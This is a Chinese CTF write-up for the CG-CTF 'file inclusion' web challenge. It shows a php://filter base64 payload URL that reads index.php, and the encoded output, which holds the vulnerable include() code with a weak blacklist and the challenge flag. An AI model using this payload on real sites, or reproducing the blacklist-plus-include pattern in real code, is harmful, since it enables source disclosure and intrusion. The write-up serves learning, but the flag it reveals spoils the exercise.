文件包含

1.查看題目

2.進去查看題目，看到下面第一幅圖中的內容，我們點擊這個超鏈接

3.點擊上圖的超鏈接后，出現下圖所示

4.根據URL與題目名，可以知道這里應該是利用文件包含
（1）首先嘗試…/，發現出現下圖所示：

源代碼也沒有什么可以利用的：

（2）其實這里利用的是php偽協議，下圖是index.php經過base64加密的源碼

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

• 加密后的密文

PGh0bWw+CiAgICA8dGl0bGU+YXNkZjwvdGl0bGU+CiAgICAKPD9waHAKCWVycm9yX3JlcG9ydGluZygwKTsKCWlmKCEkX0dFVFtmaWxlXSl7ZWNobyAnPGEgaHJlZj0iLi9pbmRleC5waHA/ZmlsZT1zaG93LnBocCI+Y2xpY2sgbWU/IG5vPC9hPic7fQoJJGZpbGU9JF9HRVRbJ2ZpbGUnXTsKCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpewoJCWVjaG8gIk9oIG5vISI7CgkJZXhpdCgpOwoJfQoJaW5jbHVkZSgkZmlsZSk7IAovL2ZsYWc6bmN0ZntlZHVsY25pX2VsaWZfbGFjb2xfc2lfc2lodH0KCj8+CjwvaHRtbD4=

• 上圖是使用的php://filter/read=convert.base64-encode/resource=index.php

• 這里使用的過濾器是convert.base64-encode。它的作用就是讀取index.php（這個你可以是經過測試show.php和index.php后得出的）的內容進行base64編碼后輸出。可以用于讀取程序源代碼經過base64編碼后的數據

• php偽協議簡單介紹：

php://filter/[read/write]=string.[rot13/strip_tags/…..]/resource=xxx filter和string過濾器連用可以對字符串進行過濾。filter的read和write參數有不同的應用場景：read用于include()和file_get_contents()，write用于file_put_contents()中。php://filter/read=convert.base64-[encode/decode]/resource=xxx 這是使用的過濾器是convert.base64-encode。它的作用就是讀取xxx文件的內容進行base64編碼后輸出。可以用于讀取程序源代碼經過base64編碼后的數據

（3）接下來我們將base64密文解碼，在線加密解密

創作挑戰賽新人創作獎勵來咯，堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的CG-CTF-Web-文件包含的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。